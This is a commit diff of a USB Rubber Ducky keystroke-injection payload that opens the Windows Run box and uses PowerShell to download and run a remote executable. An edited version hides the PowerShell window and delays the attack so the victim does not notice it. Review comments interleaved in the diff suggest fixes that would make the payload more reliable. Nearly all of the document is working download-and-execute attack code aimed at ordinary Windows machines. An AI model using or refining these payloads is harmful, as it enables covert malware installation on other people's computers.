The download process is now hidden from the victim's eyes as the code will run in a hidden PowerShell window. Also, after the file finishes executing, the PowerShell window will be closed.
This commit is contained in:
parent a29f3651eb
commit 00986e4168
@ -1,19 +0,0 @@
Powershell Wget + Execute

Author: mubix
Duckencoder: 1.2
Target: Windows 7
Description: Opens “RUN” box, throws power shell string, enter. Supports HTTP/S, and proxies.
GUI r
DELAY 100
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
ENTER

Adding two words to this makes it possible to hide the powershell window as it downloads and executes.

```
GUI r
DELAY 100
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
ENTER
```
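Review bot: this hunk deletes the whole original file instead of editing it, and the following hunk re-adds all 19 original lines unchanged (the mubix header and both GUI r / DELAY 100 / STRING / ENTER blocks) before the new section, so the change is really an append. If the file was renamed (path or letter case), say so in the commit message; otherwise make it an in-place modification so blame and history for the original lines, and the `Author: mubix` attribution, stay attached to them.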
@ -0,0 +1,71 @@
Powershell Wget + Execute

Author: mubix
Duckencoder: 1.2
Target: Windows 7
Description: Opens “RUN” box, throws power shell string, enter. Supports HTTP/S, and proxies.
GUI r
DELAY 100
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
ENTER

Adding two words to this makes it possible to hide the powershell window as it downloads and executes.

```
GUI r
DELAY 100
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
ENTER
```


Edited by: Fahad Alkamli
This is an improved version for the code above.
In my opinion the user should see as minimum as possible so writing a whole line of code in the run is not discreet.

```
REM You can remove this Delay line in the beginning (I just rather having it just in case)
DELAY 60000
REM open the Run
GUI r
REM Change this value depending on the computer you are using ( i mean slow or not )
DELAY 100
STRING powershell -windowstyle hidden
ENTER
REM the shell usually takes a few seconds to fully run so i put a delay just in case .
DELAY 1000
REM I just wanted to note that the file can be an EXE or JAR file doesn't really matter.
REM in the destination if you put the fileName only, the file will be saved under C:\Users\LoggedInUser
STRING $source = "File URL "; $destination = "Path\FileName"; Invoke-WebRequest $source -OutFile $destination;
ENTER
DELAY 5000
STRING start-process FileName.EXE
ENTER
DELAY 100
STRING exit
ENTER
```
Full Example with Jar:
```
REM You can remove this Delay line in the beginning (I just rather having it just in case)
DELAY 60000
REM open the Run
GUI r
REM Change this value depending on the computer you are using ( i mean slow or not )
DELAY 100
STRING powershell -windowstyle hidden
ENTER
REM the shell usually takes a few seconds to fully run so i put a delay just in case .
DELAY 1000
REM I just wanted to note that the file can be an EXE or JAR file doesn't really matter.
REM in the destination if you put the fileName only, the file will be saved under C:\Users\LoggedInUser
STRING $source = "http://192.168.43.34/Service.jar"; $destination = "Service.jar"; Invoke-WebRequest $source -OutFile $destination;
ENTER
DELAY 5000
STRING start-process Service.jar
ENTER
DELAY 100
STRING exit
ENTER
```

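Review bot: the keystroke flow in the added section does not match the commit message's claim and needs a tested result documented: after `STRING powershell -windowstyle hidden` / `ENTER`, the console is created hidden and never takes keyboard focus, so the `STRING $source = ...`, `STRING start-process ...` and `STRING exit` lines that follow are typed into whichever window is in the foreground, not into that PowerShell session; either record on which target this was verified to work, or note in a REM that the single-line form kept at the top of the file is the one that does not depend on focus. Two documentation points for the same block: `Invoke-WebRequest` requires PowerShell 3.0, while the `Target: Windows 7` header describes a system that ships with PowerShell 2.0, so the header should state the real requirement for the new section (the original `System.Net.WebClient` line does not have this dependency); and `"File URL "`, `"Path\FileName"` and `FileName.EXE` are placeholders that need a REM saying they must be replaced, since the REM above them only discusses the save location, and `start-process Service.jar` in the second example additionally depends on a `.jar` file association being present on the host, which the "EXE or JAR file doesn't really matter" REM should mention.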